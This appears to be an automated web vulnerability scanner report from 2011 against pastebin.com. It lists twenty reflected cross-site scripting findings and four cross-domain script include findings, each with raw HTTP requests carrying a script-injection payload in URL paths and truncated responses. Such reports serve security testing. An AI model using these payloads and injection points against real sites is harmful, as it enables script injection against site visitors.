1. Cross-site scripting (reflected)
1.1. http://pastebin.com/VB5KDqxW [REST URL parameter 1]
1.2. http://pastebin.com/VB5KDqxW [name of an arbitrarily supplied request parameter]
1.3. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 1]
1.4. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 2]
1.5. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 3]
1.6. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 4]
1.7. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 1]
1.8. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 2]
1.9. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 3]
1.10. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 4]
1.11. http://pastebin.com/etc/social/index.html [REST URL parameter 1]
1.12. http://pastebin.com/etc/social/index.html [REST URL parameter 2]
1.13. http://pastebin.com/etc/social/index.html [REST URL parameter 3]
1.14. http://pastebin.com/favicon.ico [REST URL parameter 1]
1.15. http://pastebin.com/i/fixed.css [REST URL parameter 1]
1.16. http://pastebin.com/i/fixed.css [REST URL parameter 2]
1.17. http://pastebin.com/i/style.css [REST URL parameter 1]
1.18. http://pastebin.com/i/style.css [REST URL parameter 2]
1.19. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 1]
1.20. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 2]
2. Cross-domain script include
2.1. http://pastebin.com/VB5KDqxW
2.2. http://pastebin.com/etc/ads/iframes/160x600.html
2.3. http://pastebin.com/etc/ads/iframes/728x90.html
2.4. http://pastebin.com/etc/social/index.html
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /VB5KDqxW |
GET /VB5KDqxW91a79"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:15:55 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:15:55 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10370 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /VB5KDqxW |
GET /VB5KDqxW?4557c"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:15:46 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:15:46 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10375 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/ads/iframes/160x600 |
GET /etcc8937"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:15:58 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:15:58 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10430 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/ads/iframes/160x600 |
GET /etc/ads2f67e"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:16:01 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:16:01 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/ads/iframes/160x600 |
GET /etc/ads/iframes2ed26"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:16:04 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:16:04 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10438 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/ads/iframes/160x600 |
GET /etc/ads/iframes/160x600 Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:16:07 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:16:07 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10439 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/ads/iframes/728x90 |
GET /etcca982"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:15:59 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:15:59 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10428 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/ads/iframes/728x90 |
GET /etc/ads8d5f2"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:16:02 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:16:02 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10429 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/ads/iframes/728x90 |
GET /etc/ads/iframese19a0"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:16:05 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:16:05 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10436 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/ads/iframes/728x90 |
GET /etc/ads/iframes/728x90 Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:16:08 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:16:08 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10436 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/social/index.html |
GET /etc19ba0"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:15:58 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:15:58 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10416 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/social/index.html |
GET /etc/social5af33"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:16:01 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:16:01 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10417 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/social/index.html |
GET /etc/social/index.htmlbf5b4"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:16:04 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:16:04 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10424 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /favicon.ico |
GET /favicon.ico676f2"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:16:42 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=3; expires=Tue, 06-Sep-2011 22:16:42 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10394 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /i/fixed.css |
GET /ica4bc"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:15:54 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:15:54 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10380 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /i/fixed.css |
GET /i/fixed.cssdc00f"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:15:57 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:15:57 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /i/style.css |
GET /i61dcc"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:16:00 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:16:00 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10403 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /i/style.css |
GET /i/style.cssbabbd"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:16:03 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:16:03 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10410 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /js/ZeroClipboard.swf |
GET /js186f6"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:16:47 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=3; expires=Tue, 06-Sep-2011 22:16:47 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10386 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /js/ZeroClipboard.swf |
GET /js/ZeroClipboard.swfc7391"><script>alert(1)< Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:16:50 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=3; expires=Tue, 06-Sep-2011 22:16:50 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10385 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <meta property="og:url" content="http://pastebin ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /VB5KDqxW |
GET /VB5KDqxW HTTP/1.1 Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive |
HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:15:41 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=2; expires=Tue, 06-Sep-2011 22:15:41 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 15635 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... <link href="/i/style.css?11" rel="stylesheet" type="text/css" /> <script src="http://platform ...[SNIP]... </script> <script type="text/javascript" src="http://tags.expo9 ...[SNIP]... </script> <script type="text/javascript" src="http://edge ...[SNIP]... <!-- End comScore Tag --> <script type="text/javascript" src="http://lolbin.net ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/ads/iframes/160x600 |
GET /etc/ads/iframes/160x600 Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:15:45 GMT Content-Type: text/html Last-Modified: Sat, 02 Jul 2011 13:17:48 GMT Connection: keep-alive Vary: Accept-Encoding Content-Length: 650 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-eq ...[SNIP]... </script> <script type="text/javascript" src="http://tags.expo9 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/ads/iframes/728x90 |
GET /etc/ads/iframes/728x90 Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:15:46 GMT Content-Type: text/html Last-Modified: Sat, 02 Jul 2011 13:17:34 GMT Connection: keep-alive Vary: Accept-Encoding Content-Length: 658 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equi ...[SNIP]... </script> <script type="text/javascript" src="http://tags.expo9 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /etc/social/index.html |
GET /etc/social/index.html HTTP/1.1 Host: pastebin.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: cookie_key=1 |
HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:15:46 GMT Content-Type: text/html Last-Modified: Tue, 05 Jul 2011 14:20:11 GMT Connection: keep-alive Vary: Accept-Encoding Content-Length: 920 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-eq ...[SNIP]... </title> <script type="text/javascript" src="https://apis.google <script src="http://connect ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /VB5KDqxW |
GET /robots.txt HTTP/1.0 Host: pastebin.com |
HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Tue, 09 Aug 2011 22:15:42 GMT Content-Type: text/plain Content-Length: 178 Last-Modified: Thu, 30 Jun 2011 08:34:38 GMT Connection: close Vary: Accept-Encoding Accept-Ranges: bytes User-agent: * Disallow: /download.php Disallow: /report.php Disallow: /raw.php Disallow: /embed.php Disallow: /embed_iframe.php Disallow: /embed_js.php Disallow: /diff.php |